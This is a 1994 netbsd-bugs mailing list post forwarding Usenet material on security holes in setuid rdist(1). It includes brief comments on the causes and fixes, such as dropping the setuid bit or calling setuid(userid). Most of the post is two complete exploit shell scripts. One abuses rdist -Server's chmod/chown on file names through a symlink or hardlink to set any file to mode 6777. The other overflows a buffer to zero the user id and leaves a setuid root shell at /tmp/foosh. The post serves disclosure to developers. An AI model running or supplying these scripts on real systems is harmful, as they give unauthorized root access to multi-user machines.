Subject: rdist(1) security bugs
To: None <netbsd-bugs@sun-lamp.cs.berkeley.edu>
From: Frank van der Linden <vdlinden@fwi.uva.nl>
List: netbsd-bugs
Date: 03/15/1994 22:38:52
Hi,
Below are a couple of scripts and comments from comp.security.misc
that demonstrate security bugs in rdist(1).
The original scripts were made by:
1991.9.14 -Tsutomu Shimomura, Los Alamos National Laboratory
tsutomu@no-sense.LANL.GOV.
I've been able to get the second script working.
(The second script has two very long lines, hope they survive).
Comments from Dave Hayes (dave@elxr.jpl.nasa.gov) in comp.security.misc:
>Here are the scripts I promised. Each checks for one of the RDIST holes.
>There are two fixes to this problem.
> 1) Remove the setuid bit from rdist (chmod 711 rdist)
> 2) Obtain Rdist 6.1beta.3 via anonymous ftp from usc.edu (pub/rdist)
Comments from Casper Dik (casper@fwi.uva.nl) in comp.security.misc:
>The first script uses the gaping hole that does chown()/chmod on
>file names as root, instead of fchmod or fchown.
>
>The second one blows a bugger (4 times, each time one byte shorter).
>In oding so it overwrites the global variable ``userid'' that just
>happens to be next to it. The trailing 0 from the 4 iterations
>zeros the userid variable.
>
>Both bugs can be fixed by adding one line at the beginning of the
>server routine:
>
> setreuid(userid,userid); or setuid(userid);
>
>
>There is no need for rdist -Server to run as root.
>
>Casper
#! /bin/sh
# GIMME - "gimme' a file"
# Demonstrate rdist's ability to give me permission to access anything.
#
# gimme <pathname> [<permission> [<directory>]]
# <pathname> is the target file.
# <permission> is the octal mode to which the file access permission
# should be set. Note that this may not be effective unless
# either the SUID (4000) or SGID (2000) bits are also requested.
# <directory> is the target directory for rdist to use if a hard
# link is desired. Note that the user must have permission
# to create this directory, it must be on the same filesystem
# as the target file, and the target file must not be a
# directory. This option is necessary to change the ownership
# of the target if chown() of a symbolic link modifies the
# link itself, and not the file it refers to.
#
dirname=gimme$$
deftemp=/tmp
defperm=6777
if [ $1x = x ]; then
echo "Usage: $0 <pathname> [<permission> [<directory>]]" >&2
exit 1
fi
if [ $2x != x ]; then
perm=$2
else
perm=$defperm
fi
if [ $3x != x ]; then
link="ln"
temp=$3/$dirname
target=$1
else
link="ln -s"
temp=$deftemp/$dirname
case $1 in
/*)
target=$1
;;
*)
target=`pwd`/$1
;;
esac
fi
trap "rm -fr $temp; exit 1" 1 2 15
umask 66
mkdir $temp; if [ $? != 0 ]; then
exit 1
fi
set `whoami` $LOGNAME
user=$1
set daemon `groups`
while [ $# != 1 ]; do
shift
done
group=$1
(
echo "t$temp/something"
echo "R0 $perm 1 0 $user $group "
while [ ! -f $temp/rdist* ]; do
sleep 1
done
set $temp/rdist*
rm -f $1
if $link $target $1 >&2; then
echo "" | dd bs=3 conv=sync 2>/dev/null
echo ""
echo 0 > $temp/status
else
echo 1 > $temp/status
fi
exit
) | rdist -Server
status=`cat $temp/status`
rm -fr $temp
exit $status
---------------------------CUT HERE -------------------------------
#!/bin/sh
SUID=/tmp/foosh
cat <<_EOF_ > test
Taaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
aaaaaaaaaaaa
Qaaaaaaaaaaaaaaaaaaaaaaaaaa
Qaaaaaaaaaaaaaaaaaaaaaaaaa
Qaaaaaaaaaaaaaaaaaaaaaaaa
Qaaaaaaaaaaaaaaaaaaaaaaa
Scp /bin/sh $SUID
Schmod 4755 $SUID
_EOF_
cat test | /usr/ucb/rdist -Server localhost
rm -rf test
if [ -f $SUID ]; then
echo "$SUID is a setuid shell. "
fi
------------------------------------------------------------------------------